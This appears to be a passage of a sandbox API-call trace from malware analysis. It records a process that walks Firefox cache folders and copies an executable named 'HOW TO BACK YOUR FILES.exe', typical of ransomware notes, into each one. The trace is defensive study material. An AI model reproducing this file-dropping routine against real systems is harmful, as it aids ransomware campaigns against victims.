nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.000] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0" [0111.001] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0" [0111.001] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.001] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\e0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.001] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.002] GetLastError () returned 0x0 [0111.002] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.002] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e8d330, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x6bb47160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6bb47160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.002] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61" [0111.002] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61" [0111.003] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.003] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\61\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.003] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.003] GetLastError () returned 0x0 [0111.004] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.004] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb7f47cd0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x6bb47160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6bb47160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.006] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C" [0111.007] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C" [0111.007] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.007] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\2c\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.008] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.008] GetLastError () returned 0x0 [0111.009] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.009] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb7d58af0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x6bb47160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6bb47160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.009] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10" [0111.009] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10" [0111.009] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.009] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\10\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.010] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.010] GetLastError () returned 0x0 [0111.010] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.010] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb7f47cd0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x6bb6d2c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6bb6d2c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.011] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\8", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\8") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\8" [0111.011] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\8" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\8") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\8" [0111.011] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.011] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\8\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\8\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.012] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.012] GetLastError () returned 0x0 [0111.012] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.012] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\8\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb6518ad0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d940a60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d940a60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.013] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\7", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\7") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\7" [0111.013] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\7" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\7") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\7" [0111.013] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.013] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\7\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\7\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.013] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.014] GetLastError () returned 0x0 [0111.014] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.014] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\7\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb6518ad0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d966bc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d966bc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.014] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\6", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\6") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\6" [0111.015] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\6" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\6") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\6" [0111.015] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.015] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\6\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\6\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.015] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.016] GetLastError () returned 0x0 [0111.016] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.016] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\6\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb6518ad0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d966bc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d966bc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.016] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\5", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\5") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\5" [0111.016] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\5" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\5") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\5" [0111.016] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.016] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.017] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.017] GetLastError () returned 0x0 [0111.018] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.018] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\5\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb64f2970, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d966bc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d966bc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.018] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\4", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\4") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\4" [0111.018] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\4" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\4") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\4" [0111.018] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.018] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\4\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\4\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.019] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.019] GetLastError () returned 0x0 [0111.019] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.019] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\4\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb64f2970, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d966bc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d966bc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.020] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3" [0111.020] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3" [0111.020] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.020] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\3\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.021] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.021] GetLastError () returned 0x0 [0111.021] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" 